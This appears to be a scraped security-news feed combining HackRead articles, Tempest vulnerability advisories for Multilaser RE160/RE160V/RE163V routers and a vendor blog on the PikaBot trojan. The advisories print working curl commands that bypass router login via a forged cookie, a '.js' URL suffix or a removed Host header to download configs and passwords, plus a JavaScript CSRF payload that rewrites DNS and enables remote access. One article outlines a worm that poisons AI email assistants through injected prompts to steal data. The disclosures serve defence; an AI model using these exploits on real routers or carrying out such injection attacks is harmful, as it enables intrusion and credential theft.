By Deeba Ahmed
Group-IB Report Warns of Evolving Cyber Threats Including AI and macOS Vulnerabilities and Ransomware Attacks.
This is a post from HackRead.com Read the original post: Report Uncovers Massive Sale of Compromised ChatGPT Credentials

Group-IB report unveils: compromised ChatGPT accounts sold on dark web, highlighting AI security risks, ransomware surge, macOS vulnerabilities. Take action to stay safe.

Group-IB’s Threat Intelligence has released a “Hi-Tech Crime Trends 23/24” report highlighting a dramatic surge in ransomware attacks, macOS system threats, and the growing use of AI by cyber criminals.

The report revealed Asia-Pacific being the primary target for advanced persistent threat groups in 2023, with 523 attacks worldwide. APAC organizations accounted for 34% of global attacks, with Europe and the Middle East ranking second and Africa third.

A 70% rise in public ads selling zero-day exploits was recorded during 2022-2023. Threats like the **CVE-2023-38831** zero-day vulnerability in ZIP file format remained popular among advanced cybercrime groups and nation-state actors for cyber-espionage activities. 

The report also warned of a growing interest in AI systems, **particularly ChatGPT** credentials, for reaching sensitive corporate data as public Large Language Models (LLMs) often do not protect accounts with multi-factor authentication.

AI systems can let attackers access confidential information, including internal source code, financial data, and trade secrets, and access communication history logs between employees and systems, allowing attackers access to sensitive data.

Over 225,000 infostealer logs containing compromised ChatGPT credentials were detected between January-October 2023. Four ChatGPT-style tools were developed since mid-2023 to facilitate such activities, including WolfGPT, DarkBARD, **FraudGPT, and WormGPT**. FraudGPT and WormGPT are popular for social engineering and phishing, while WolfGPT focuses on code or exploits.

Researchers detected around 130,000 compromised hosts with ChatGPT access between June and October 2023, marking a 36% increase from the previous year. The **LummaC2** information stealer breached most logs.

Researchers also detected 4,583 companies with their information, files, and data published on ransomware Distributed Leaks (DLSs), marking a 74% growth from the previous year, with North American companies being the biggest victims. 

Global threat actors, primarily APT groups, are targeting Apple platforms more, with underground sales of macOS information stealers increasing fivefold. Most concerning cyber risks for 2024 include zero-day exploits and malicious service use.

Cybersecurity firms have long been raising alarm over the continuous expansion in the global cyber threats spectrum. In June 2023, Group-IB researchers **discovered** a trend of over 100,000 devices infected with stolen ChatGPT credentials, with 26,802 compromised accounts recorded in May 2023. The Asia-Pacific region had the highest concentration of compromised credentials. ChatGPT’s default settings store user queries and AI responses, exposing confidential information.

In January 2024, Kaspersky Digital Footprint Intelligence **reported** threat actors exploiting AI technologies for illegal activities, sharing jailbreaks and exploiting legitimate tools for malicious purposes, particularly ChatGPT and LLMs, which can be used for malicious purposes, including malware development and illicit language model use.

The latest **report** highlights a significant rise in ransomware attacks targeting manufacturing, real estate, healthcare, government, and military sectors, the growing sophistication of **cybercriminals targeting macOS systems**, and the potential misuse of AI by cybercriminals to automate tasks, personalize attacks, and bypass security measures.

Businesses should invest in robust security solutions like firewalls, endpoint protection software, and intrusion detection systems, along with offering employee training on cyber threats to stay protected.

1.  **OpenAI’s ChatGPT Can Create Polymorphic Malware**
2.  **Malicious Abrax666 AI Chatbot Exposed as Potential Scam**
3.  **Malicious Ads Infiltrate Bing AI Chatbot in Malvertising Attack**
4.  **Following WormGPT, FraudGPT Emerges for AI-Driven Cyber Crime**
5.  **Researcher create polymorphic Blackmamba malware with ChatGPT**

Report Uncovers Massive Sale of Compromised ChatGPT Credentials

By Waqas
Researchers have created computer worms with self-propagation capabilities that target GenAI applications.
This is a post from HackRead.com Read the original post: Researchers Test Zero-click Worms that Exploit Generative AI Apps

A new study dubbed ComPromptMized, warns of zero-click worms exploiting generative AI, spreading through systems sans user interaction, and posing data theft risks. Experts stress urgent AI security measures.

Researchers have recently unveiled findings indicating the creation of a computer worm capable of targeting generative AI-powered applications. This revelation comes amidst growing concerns over the **security of artificial intelligence systems**.

In a collaborative effort led by Stav Cohen from Technion – Israel Institute of Technology, Ron Bitton from Intuit, and Ben Nassi from Cornell Tech, the team developed and tested this novel worm against popular AI models, including Gemini Pro (previously **Bard AI**), **ChatGPT**, and LLaVA.

While the study highlights the potential malicious applications of such technology, it also echoes a warning **issued last year** by Europol regarding prompt engineering and jailbreaking of AI chatbots.

The research suggests that attackers could exploit this worm to manipulate AI models into replicating malicious inputs and engaging in harmful activities. One alarming demonstration involved the worm **attacking generative AI** email assistants, effectively stealing email data and distributing spam.

The mechanism behind the worm’s operation is intriguing yet concerning. By introducing specific text into an email, attackers could “poison” the databases of certain email application clients. This manipulation could then prompt models like ChatGPT and Gemini to replicate the malicious input and extract sensitive user data from the context.

In their **study** dubbed ComPromptMized, the researchers explored various scenarios, including both black-box and white-box accesses, and tested the worm’s effectiveness against different types of input data, such as text and images. The findings underscore the potential threats posed by such attacks on the burgeoning **GenAI ecosystems**.

The implications of this research extend beyond theoretical concerns. As more companies integrate generative AI capabilities into their applications, the risk of exploitation becomes increasingly tangible. The ability of malicious actors to leverage AI technology for nefarious purposes underscores the urgent need for robust security measures in AI development and deployment.

**Beth Linker**, Senior Director of AI & SAST at the Synopsys Software Integrity Group, emphasized the significance of this research, stating, “This attack highlights the vulnerability of GenAI-powered proactive agents as a potential target for exploitation. With the proliferation of new AI-driven tools promising to streamline our digital interactions, it is crucial for organizations to carefully consider the permissions granted to these tools and implement robust safety measures.”

While the research provides valuable insights into the vulnerabilities of generative AI systems, it also serves as a call to action for stakeholders across various industries. As we continue to embrace the benefits of AI innovation, it is imperative to remain alert against emerging threats and prioritize the development of strong security protocols.

1.  OpenAI’s ChatGPT Can Create Polymorphic Malware
2.  Malicious Abrax666 AI Chatbot Exposed as Potential Scam
3.  Malicious Ads Infiltrate Bing AI Chatbot in Malvertising Attack
4.  Following WormGPT, FraudGPT Emerges for AI-Driven Cyber Crime
5.  Researcher create polymorphic Blackmamba malware with ChatGPT

Researchers Test Zero-click Worms that Exploit Generative AI Apps

By Waqas
Another day, another third-party data breach!
This is a post from HackRead.com Read the original post: American Express Cardholders Impacted by Third-Party Vendor Data Breach

American Express cardholders are advised to be vigilant after a data breach at a third-party vendor potentially exposed some card information. While American Express systems remain secure, the breach may have compromised card numbers, names, expiration dates, and other details.

American Express notified card members today of a data breach impacting some customer information, emphasizing that its systems were not compromised. The breach originated from a third-party service provider used by numerous merchants, potentially exposing customer details including card numbers, names, and expiration dates.

****What Happened:****

American Express discovered unauthorized access to a system utilized by a third-party service provider engaged by various merchants. This incident may have compromised the account information of some American Express card members.

American Express has filed a data breach notification with the state of Massachusetts regarding potential impacts on cardholder information, which may include current or previously issued American Express card numbers, cardholder names, and card information such as expiration dates.

> _“At this time, we have been informed that your current or previously issued American Express Card account number, your name and other Card information such as the expiration date, may have been compromised. Please be aware that you may receive additional letters from us if more than one of your American Express Card accounts were involved.”_
> 
> American Express

In response to this situation, American Express has taken several measures to address the issue. The company has affirmed the security of its own systems and is actively monitoring accounts for any signs of fraudulent activity.

Additionally, cardholders are reassured that they are not liable for unauthorized charges. American Express has provided resources and information on fraud protection through its Security Center website.

For insights into this, we reached out to Piyush Pandey, CEO at Pathlock who stated, “Over the last few years, we’ve seen a significant uptick in third-party data breaches. In this example, there are multiple parties, or what we call “nth party” risk. This places a much greater emphasis on organizations to vet their third parties during onboarding to minimize access risk.”

Piyush also cautioned businesses about the importance of scrutinizing third parties before entering into business partnerships with them. “Organizations must also ensure that the third-party partners of the third parties they are doing business with are assessed for access risk. It should become part of standard third-party contracts to specify breach response responsibilities,” he explained. “Masking data to provide only what is needed by third parties to provide services must be a best practice.”

Nevertheless, American Express card members are advised to review their account statements for any suspicious activity, especially over the next 12-24 months. They are also encouraged to enable account notifications via the American Express Mobile app or through email/text messaging for added security.

Furthermore, updating contact information with American Express is recommended to ensure smooth communication if necessary.

****Rising Incidents of Third-Party Data Breaches****

The beginning of 2024 has witnessed a noticeable uptick in data breaches affecting diverse sectors, including corporate entities and governmental organizations. On February 23 2024, a threat actor using the alias IntelBroker leaked 2.4 million data belonging to private plane owners linked to the Los Angeles International Airport.

In August 2023, an IT contractor employed by the Metropolitan Police Force experienced a cyberattack that impacted over 50,000 MET police personnel.

In September 2023, a third-party contractor experienced a data breach that affected over 8,000 Greater Manchester Police Officers. In October 2023, another contractor inadvertently exposed their database, resulting in the leakage of sensitive details about 500,000 Irish Police vehicle seizure records.

1.  **23andMe blames its users for the massive data breach**
2.  **AnyDesk Urges Password Change Amid Security Breach**
3.  **Defunct Ambulance Service Data Breach Impacts 1 Million**
4.  **Cloudflare Hacked After State Actor Leverages Okta Breach**
5.  **RingGo Owner EasyPark Hit by Data Breach, User Data Stolen**
6.  **LockBit Ransomware Claims Data Breach at SpaceX Contractor**
7.  **CutOut.Pro AI Tool Data Breach: Hacker Leak 20 Million User Info**

American Express Cardholders Impacted by Third-Party Vendor Data Breach

By Deeba Ahmed
Leaked Military Audio Raises Stakes in Russia-Ukraine Conflict.
This is a post from HackRead.com Read the original post: Russian Operatives Expose German Military Webex Conversations

In the recording, four senior Bundeswehr (German Armed Forces) officers are discussing the hypothetical export of Taurus cruise missiles to Ukraine, and how to attack Russian infrastructure through them.

Russian spies leaked a 38-minute audio file of German military officials discussing Taurus cruise missile deliveries to Ukraine, raising questions about the military’s information security practices, as reported by Russian state broadcaster RT.

The German Defence Ministry has accused Russia of launching an “information war” following the publication of the recording of a meeting of senior German military officials, calling the incident an act of eavesdropping and a “hybrid disinformation attack” by Russia-backed spies.

Reportedly, the spies could record the conversation by joining a Webex conference. The conversation reveals plans for the shipment of advanced weaponry to pro-Russian separatists in eastern Ukraine and a possible military strike on Crimea, a Ukrainian peninsula currently under Russian control. 

It is worth noting that Kyiv wants Germany’s Taurus missiles, long-range missiles from France and Britain, and Ukrainian soldier training amid the ongoing war in Ukraine since the country is facing soldiers and ammunition shortages. The transcript of the conversation, which took place on 19 February, was published by RT on 1st March. 

In the recording, four senior Bundeswehr (German Armed Forces) officers are discussing the hypothetical export of Taurus cruise missiles to Ukraine, and how to attack Russian infrastructure through them.

German Chancellor Olaf Scholz refuses to send such long-range cruise missiles, causing splintering within the country’s governing coalition. The recording, shared on social media, revealed that the German Air Force’s chief, Lieutenant General Ingo Gerhartz **expressed** concern about direct connections with the Ukrainian armed forces. 

Russian officials also discussed potential targets for Taurus missiles donated to Ukraine, the training time for local personnel, and the possibility of using the missiles to destroy the Kerch bridge linking Crimea to Russia.

They also discussed preparations for a meeting with MP Boris Pistorius to send around 10-20 Taurus missiles from Germany’s 600-strong stockpile to counter Russia’s air defences and destroy the Kerch connection. They also discussed transporting data for Taurus programming from German airbases into Ukraine.

As per DW, the Defence Ministry has confirmed the recording’s authenticity and German Chancellor Olaf Scholz referred to it as a “very serious matter.” German Social Democrats MP Pistorius criticized the leaked audio, stating it was suspiciously published just before opposition leader Alexei Navalny’s funeral. 

Germany’s Military Counterintelligence Service is investigating the leaked audio, which comes just days after Scholz inferred that British and French staff are helping calibrate missile targets for Ukrainians.

1.  Microsoft Executives’ Emails Breached by Russia Hackers
2.  Russian Hackers Hit Mail Servers in Europe for Military Intel
3.  Russian APT29 Hacked US Biomedical Giant in TeamCity Breach
4.  Russian Hackers Target Ubiquiti Routers for Data, Botnet Creation
5.  Microsoft Outlook Flaw Exploited by Russian Forest Blizzard Group

Russian Operatives Expose German Military Webex Conversations

Multilaser RE160 versions 5.07.51_pt_MTL01 and 5.07.52_pt_MTL01 suffer from an access control bypass vulnerability through cookie manipulation.

=====[Tempest Security Intelligence - Security Advisory -  
CVE-2023-38946]=======

  Access Control Bypass in Multilaser router's Web Management Interface

  Author: Vinicius Moraes  < vinicius.moraes.w () gmail com >

=====[Table of  
Contents]========================================================

1. Overview  
2. Detailed description  
3. Other contexts & solutions  
4. Acknowledgements  
5. Timeline  
6. References

=====[1.  
Overview]==============================================================

* Systems affected: Multilaser RE160 web interface -  
V5.07.51_pt_MTL01(verified)  
                                                   -  
V5.07.52_pt_MTL01(verified)  
                                        (other routers/versions may be  
affected)  
* Release date: 28/02/2024  
* CVSS score: 7.7 / High  
* CVSS vector:  
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N  
* Impact: This vulnerability allows attackers to bypass the access control  
of  
          the router's web interface and perform management actions, such as  
          changing the DNS settings, enabling router remote access,  
changing the  
          IP routing table, and retrieving the WiFi and management  
application  
          passwords. A noteworthy aspect also regards the fact that the  
attack  
          can be conducted remotely.

=====[2. Detailed  
description]==================================================

The affected Multilaser router has a web management interface designed to  
graphically assist users in configuring features and diagnosing problems.  
However, there is a bug in its access control mechanism that allows  
unauthenticated users to access the router's management features.

In order to exploit this bug, it is necessary to add an "admin:" cookie in  
the  
requests. The following example shows how an unauthenticated user (not  
bearing  
a credential or session token) could perform it by using the curl tool[1]  
to  
retrieve, for example, a backup of the router config, which contains its  
web  
interface password:

[snippet]

$ # traditional unauthenticated request being redirected to the login page  
$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg | grep -E  
'HTTP/|Locatio'  
HTTP/1.0 302 Redirect  
Location: http://[routerIpAddress]/login.asp  
$  
$ # malicious unauthenticated request getting the web interface password  
$ # (in this example: "pass123")  
$ curl -isH 'Cookie: admin:' [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg |  
grep  
-E 'HTTP/|http_passwd'  
HTTP/1.0 200 OK  
http_passwd=pass123

[/snippet]

By performing the aforementioned steps, an attacker gains access to all  
features  
of the web interface, either by exploiting the issue in other endpoints or  
by  
using the interface password, contained in the router config, as a  
traditional  
user.

This vulnerability can be exploited remotely via a malicious mobile/desktop  
application performing HTTP requests against the router, or locally by  
connecting to a vulnerable router (such as through the wireless  
infrastructure  
of a coffee shop or airport).

=====[3. Other contexts &  
solutions]============================================

Conceptually, in order to fix this issue, the server receiving the request  
must  
always validate the value of the cookie as a prerequisite for enforcing  
access  
control. Besides that, this value cannot be predictable. Upon not receiving  
a  
valid session token within the request, users should be redirected to the  
login  
page.

Practically, updating to the latest firmware (V5.07.52_pt_MTL01) will  
reduce the  
attack window for this vulnerability, limiting the exploitation to only work  
when there is an active user session on the router. However, this equipment  
is  
also affected by another vulnerability with the same impact and no attack  
window  
limitation[3].

Furthermore, Multilaser informed that they contacted the firmware vendor of  
the  
model RE160, but due to the age of the equipment and its limitations, it  
will  
not receive an update. Therefore, it is recommended to replace the RE160  
router  
with a new one that is receiving updates (such as RE160V or RE163V)[4][5].

=====[4.  
Acknowledgements]======================================================

  Joaquim Brasil de Oliveira  < palulabrasil () gmail com >  
                              < twitter.com/palulabr >  
  Tempest Security Intelligence[2]

=====[5.  
Timeline]==============================================================

28/04/2023 - The bug regarding model RE160 was reported to vendor;  
29/06/2023 - A new contact was made with the company;  
29/06/2023 - Vendor sent the available latest firmware for RE160;  
07/07/2023 - It was confirmed that the latest firmware was still vulnerable;  
26/10/2023 - Vendor informed that RE160 will not receive a full fix.

=====[6.  
References]============================================================

  [1] https://curl.se  
  [2] https://tempest.com.br  
  [3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38945  
  [4]  
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v  
  [5]  
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v

Multilaser RE160 Cookie Manipulation Access Bypass

Multilaser RE160V web management interface versions 12.03.01.08_pt and 12.03.01.09_pt along with RE160 versions 5.07.51_pt_MTL01 and 5.07.52_pt_MTL01 suffer from an access control bypass vulnerability through URL manipulation.

    =====[Tempest Security Intelligence - Security Advisory -CVE-2023-38945]=======  Access Control Bypass in Multilaser routers' Web Management Interface  Author: Vinicius Moraes  < vinicius.moraes.w () gmail com >=====[Table ofContents]========================================================1. Overview2. Detailed description3. Other contexts & solutions4. Acknowledgements5. Timeline6. References=====[1.Overview]==============================================================* Systems affected: Multilaser RE160 web interface -V5.07.51_pt_MTL01(verified)                                                   -V5.07.52_pt_MTL01(verified)                                        (other routers/versions may beaffected)                    Multilaser RE160V web interface - V12.03.01.08_pt(verified)                                                    - V12.03.01.09_pt(verified)                                        (other routers/versions may beaffected)                    Multilaser RE163V web interface - V12.03.01.08_pt(verified)                                        (other routers/versions may beaffected)* Release date: 28/02/2024* CVSS score: 7.7 / High* CVSS vector:CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N* Impact: This vulnerability allows attackers to bypass the access controlof          the routers' web interface and perform management actions, such as          changing the DNS settings, enabling router remote access,changing the          IP routing table, and retrieving the WiFi and managementapplication          passwords. A noteworthy aspect also regards the fact that theattack          can be conducted remotely.=====[2. Detaileddescription]==================================================The affected Multilaser routers have a web management interface designed tographically assist users in configuring features and diagnosing problems.However, there is a bug in its access control mechanism that allowsunauthenticated users to access routers' management features.In order to exploit this bug, it is necessary to add a specific extensionat theend of the URLs. Some acceptable extension values are: js, css, png, jpg,gif,jsp. The following example shows how an unauthenticated user (not bearing acredential or session token) could perform it by using the curl tool[1] toretrieve, for example, a backup of the RE160 router config, which containsitsweb interface password:[snippet]$ # traditional unauthenticated request being redirected to the login page$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/C.cfg | grep -E'HTTP/|Locatio'HTTP/1.0 302 RedirectLocation: http://[routerIpAddress]/login.asp$$ # malicious unauthenticated request getting the web interface password$ # (in this example: "pass123")$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/.js | grep -E'HTTP/|http_pass'HTTP/1.0 200 OKhttp_passwd=pass123[/snippet]Furthermore, the next example presents part of a JavaScript code that couldbeadded to a malicious website with the purpose of changing the router's DNSaddress and enabling remote access on vulnerable RE160V and RE163V routers.This can be achieved by exploiting this access control issue and a CSRF[3]:[code]fetch('http://[routerIpAddress]/goform/setSysTools/.js', {    'method': 'POST',    'mode': 'no-cors',    'headers': {        'Content-Type': 'application/x-www-form-urlencoded'    },    'body':'module2=wanAdvCfg&module3=lanCfg&lanDns1=[newDnsAddress]&lanDns2=&    module4=remoteWeb&remoteWebEn=true&remoteWebType=any&remoteWebPort=8080'})[/code]By performing the aforementioned steps, an attacker can gain access to allfeatures of the web interface.This vulnerability can be exploited remotely via a malicious website or amobile/desktop application performing HTTP requests against the router. Andalso locally, by connecting to a vulnerable router (such as through thewirelessinfrastructure of a coffee shop or airport).=====[3. Other contexts &solutions]============================================Conceptually, in order to fix this issue, the server receiving the requestmustalways validate the session token in authenticated features as aprerequisitefor enforcing access control, regardless of any extension in the URL. Uponnotreceiving a valid session token within the request, users should beredirectedto the login page.Practically, to mitigate this issue, the RE160V should be updated tofirmwareV12.03.01.12 or newer[4], the RE163V to firmware V12.03.01.10 or newer[5].Multilaser informed that they contacted the firmware vendor of the modelRE160,but due to the age of the equipment and its limitations, it will notreceive anupdate to fix the issue. Therefore, it is recommended to replace the RE160router with a new one that has received the fix (such as RE160V or RE163V).=====[4.Acknowledgements]======================================================  Joaquim Brasil de Oliveira  < palulabrasil () gmail com >                              < twitter.com/palulabr >  Tempest Security Intelligence[2]=====[5.Timeline]==============================================================13/02/2023 - The latest available firmware for model RE163V (V12.03.01.10)fixedthe bug;28/04/2023 - The bug regarding model RE160V was reported to the vendor;29/06/2023 - A new contact was made with the company;29/06/2023 - Vendor shared a firmware update (V12.03.01.09) for RE160V;07/07/2023 - The same bug in model RE160 was reported to the vendor;16/10/2023 - Vendor shared a new firmware for RE160V (V12.03.01.12) wherethebug was fixed;26/10/2023 - Vendor informed that RE160 will not receive a fix;26/10/2023 - Vendor released the RE160V update on its website[4].=====[6.References]============================================================  [1] https://curl.se  [2] https://tempest.com.br  [3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31152  [4]https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v  [5]https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v

Multilaser RE160V / RE160 URL Manipulation Access Bypass

Multilaser RE160V web management interface versions 12.03.01.09_pt and 12.03.01.10_pt suffer from an access control bypass vulnerability through header manipulation.

ulldisclosure-bounces@seclists.org>  
Status: RO  
Content-Length: 5433  
Lines: 153

=====[Tempest Security Intelligence - Security Advisory -  
CVE-2023-38944]=======

  Access Control Bypass in Multilaser routers' Web Management Interface

  Author: Vinicius Moraes  < vinicius.moraes.w () gmail com >

=====[Table of  
Contents]========================================================

1. Overview  
2. Detailed description  
3. Other contexts & solutions  
4. Acknowledgements  
5. Timeline  
6. References

=====[1.  
Overview]==============================================================

* Systems affected: Multilaser RE160V web interface - V12.03.01.09_pt  
(verified)  
                                        (other routers/versions may be  
affected)  
                    Multilaser RE163V web interface - V12.03.01.10_pt  
(verified)  
                                        (other routers/versions may be  
affected)  
* Release date: 28/02/2024  
* CVSS score: 7.7 / High  
* CVSS vector:  
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N  
* Impact: This vulnerability allows attackers to bypass the access control  
of  
          the routers' web interface and perform management actions, such as  
          changing the DNS settings, enabling router remote access,  
changing the  
          IP routing table, and retrieving the WiFi and management  
application  
          passwords. A noteworthy aspect also regards the fact that the  
attack  
          can be conducted remotely.

=====[2. Detailed  
description]==================================================

The affected Multilaser routers have a web management interface designed to  
graphically assist users in configuring features and diagnosing problems.  
However, there is a bug in its access control mechanism that allows  
unauthenticated users to access the routers' management features.

In order to exploit this bug, it is necessary to remove the Host header of  
the  
HTTP requests. The following example shows how an unauthenticated user (not  
bearing a credential or session token) could perform it by using the curl  
tool[1] to retrieve, for example, a backup of the router config:

[snippet]  
$ # traditional unauthenticated request being redirected to the login page  
$ curl -is [routerIpAddress]/cgi-bin/DownloadCfg/RouterCfm.cfg | head -8  
HTTP/1.0 302 Redirect  
Server: GoAhead-Webs  
Date: Sun Jun 28 11:59:42 2009  
Pragma: no-cache  
Cache-Control: no-cache  
Content-Type: text/html  
Location: http://[routerIpAddress]/login.html

$ # malicious unauthenticated request getting the router config  
$ curl -isOH 'Host:' [routerIpAddress]/cgi-bin/DownloadCfg/RouterCfm.cfg  
$ head -8 RouterCfm.cfg  
HTTP/1.0 200 OK  
Date: Sun Jun 28 12:00:00 2009  
Server: GoAhead-Webs  
Last-modified: Sun Jun 28 12:00:00 2009  
Content-length: 16108  
Content-type: config/conf  
Connection: close

[/snippet]

By performing the aforementioned steps, an attacker gains access to all  
features  
of the web interface, either by exploiting the issue in other endpoints or  
by  
using the interface password, contained in the router config, as a  
traditional  
user:

[snippet]

$ # getting the web interface password (in this example: "myPass333")  
$ # stored in base64 in the config file  
$ awk -F 'd=' '/http_passwd=/{ print $2 }' RouterCfm.cfg | tr -d '\15'  
bXlQYXNzMzMz  
$ # decoding the web interface password  
$ echo "bXlQYXNzMzMz" | base64 -d  
myPass333

[/snippet]

This vulnerability can be exploited remotely via a malicious mobile/desktop  
application performing HTTP requests against the router, or locally by  
connecting to a vulnerable router (such as through the wireless  
infrastructure  
of a coffee shop or airport).

=====[3. Other contexts &  
solutions]============================================

Conceptually, in order to fix this issue, the server receiving the request  
must  
always validate the session token as a prerequisite for enforcing access  
control, regardless of any header. Upon not receiving a valid session token  
within the request, users should be redirected to the login page.

Practically, to mitigate this issue, the routers should be updated to  
firmware  
V12.03.01.12 or newer[3][4].

=====[4.  
Acknowledgements]======================================================

  Joaquim Brasil de Oliveira  < palulabrasil () gmail com >  
                              < twitter.com/palulabr >  
  Tempest Security Intelligence[2]

=====[5.  
Timeline]==============================================================

28/04/2023 - The bug regarding model RE163V was reported to the vendor;  
29/06/2023 - A new contact was made with the company;  
29/06/2023 - Vendor informed they were analysing the bug;  
19/07/2023 - Vendor shared a new firmware update for RE163V;  
25/07/2023 - The same bug in model RE160V was reported to the vendor;  
04/08/2023 - Vendor shared a new firmware update for RE163V;  
30/08/2023 - Vendor fixed the bug in RE163V with firmware V12.03.01.12;  
16/10/2023 - Vendor fixed the bug in RE160V with firmware V12.03.01.12;  
26/10/2023 - vendor released the updates on its website[3][4].

=====[6.  
References]============================================================

  [1] https://curl.se  
  [2] https://tempest.com.br  
  [3]  
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-3-ant-re163v  
  [4]  
https://suporte.multilaser.com.br/produtos/rot-300mbps-ipv6-2-4-ghz-2-ant-re160v

Multilaser RE160V Header Manipulation Access Bypass

As many as 100 malicious artificial intelligence (AI)/machine learning (ML) models have been discovered in the Hugging Face platform.
These include instances where loading a pickle file leads to code execution, software supply chain security firm JFrog said.
"The model's payload grants the attacker a shell on the compromised machine, enabling them to gain full control over victims'

Over 100 Malicious AI/ML Models Found on Hugging Face Platform

U.S. cybersecurity and intelligence agencies have warned of Phobos ransomware attacks targeting government and critical infrastructure entities, outlining the various tactics and techniques the threat actors have adopted to deploy the file-encrypting malware.
“Structured as a ransomware as a service (RaaS) model, Phobos ransomware actors have targeted entities including municipal and

Phobos Ransomware Aggressively Targeting U.S. Critical Infrastructure

Ransomware gangs are using a powerful new trojan named PikaBot.

A new type of malware is being used by ransomware gangs in their attacks, and its name is PikaBot.

A relatively new trojan that emerged in early 2023, PikaBot is the apparent successor to the **infamous QakBot (QBot) trojan** that was shut down in August 2023. QBot was used by many ransomware gangs in the past for its versatile ability to facilitate initial access and deliver secondary payloads.

After QBot got shut down, there was a vacuum in the ransomware gang tool box—but **with PikaBot, that’s beginning to change**: last month we wrote about the first recorded instance of PikaBot being used by ransomware gangs, specifically Black Basta, in their attacks.

Let’s dig into how PikaBot works, how it’s distributed, how ransomware gangs use it in their attacks, and how to stop it with ThreatDown.

**A closer look at PikaBot**

To get a better idea of how PikaBot works, we need to first understand what a modular trojan is.

Simply put, **a modular trojan** is a type of malware designed to be flexible and extensible, allowing attackers to add or update its functionalities easily without needing to replace the whole malware.

The modular nature of trojans like QBot and PikaBot are what makes them so dangerous. Unlike simpler malware, **PikaBot can execute arbitrary commands, download additional payloads, and inject malicious shellcode into legitimate processes** running on a victim’s computer. Think of it like a backdoor that allows attackers to set up for the next stages of their attacks.

Once it’s installed onto a system, PikaBot has a whole host of ways to stay under the radar, evading detection by most conventional security tools through techniques like indirect system calls and advanced obfuscation methods.

**How Pikabot is distributed**

The distribution of PikaBot, like many other malicious loaders such as QBot and DarkGate, **is heavily reliant on email spam campaigns**. Even so, ThreatDown Intelligence researchers have seen PikaBot being delivered via malicious search ads as well (also known as “**malvertising**”).

PikaBot’s initial access campaigns are meticulously crafted, utilizing geolocalized spam emails that target specific countries. The emails often contain links to external SMB (Server Message Block) shares, which host malicious zip files.

SMB shares are network folders leveraging the SMB protocol—a network file sharing protocol designed for sharing files and printers across devices on a network. Attackers often use SMB shares to distribute malware. In this case, **downloading and opening the hosted zip file results in PikaBot infection.**

For example, consider the below phishing email containing a link to a zip file containing the PikaBot payload.

Source: ANY.RUN (Translation: I sent you some paperwork the other day. Did you get it?)

Once the recipient interacts with these emails by clicking on the link, they are taken to the SMB share hosting the malicious zip files.

Extracting a zip and double-clicking on the executable within it will install PikaBot.

Source: ANY.RUN

**How ransomware gangs use PikaBot**

Ransomware gangs commonly use modular trojans like PikaBot for their attacks.

Before it was shut down, for example, Qbot allowed ransomware gangs to **seamlessly integrate various attack techniques into their operations**, including stealing credentials, moving laterally across networks, and ultimately deploying ransomware or other malicious payloads.

PikaBot is being used by ransomware attackers in a similar way.

Once PikaBot has established a foothold in a network, it allows attackers to engage in **a wide range of follow-up activities**.

For example, researchers have noted affiliates of the BlackBasta ransomware gang using PikaBot to use **encrypted communications with command and control (C&C) servers**. Pikabot can also assist gangs in getting detailed information about infected systems, **helping them tailor their ransomware for maximum impact.**

**How to stop PikaBot with ThreatDown**

Besides preventing initial access through things such as a web content filter and phishing training, choosing an Endpoint Detection and Response (EDR) platform that **automatically detects and quarantines threats** like PikaBot is crucial.

However, given the constant evolution of malware, identifying dynamic threats like Pikabot boils down to two words: **threat hunting**.

At ThreatDown, we talk a lot about the importance of threat hunting for SMBs—and not for no good reason, either. Just consider the fact that, when an attacker breaches a network, they don’t attack right away. **The median amount of time between system compromise and detection is 21 days**.

By that time, it’s often too late. Data has been harvested or ransomware has been deployed.

Threat hunting helps find and remediate highly-obfuscated threats like PikaBot that can quietly lurk in the network, siphoning off confidential data and searching for credentials to access the “keys to the kingdom.”

For example, as detailed in one case study, the ThreatDown Managed Detection and Response (MDR) team employed threat hunting techniques to uncover and neutralize a sophisticated QBot attack on a reputable oil and gas company. The team’s approach involved **meticulously examining Indicators of Compromise (IoCs), analyzing network traffic, and scrutinizing unusual patterns of behavior** within the company’s IT infrastructure, ultimately resulting in Qbot’s discovery on the network and isolation of infected systems.

ThreatDown MDR workflow

**Stop threats like PikaBot today**

Want to learn more about how ThreatDown stops new threats like PikaBot? Fill out this form to speak with an expert and get a custom quote.

Tag

#intel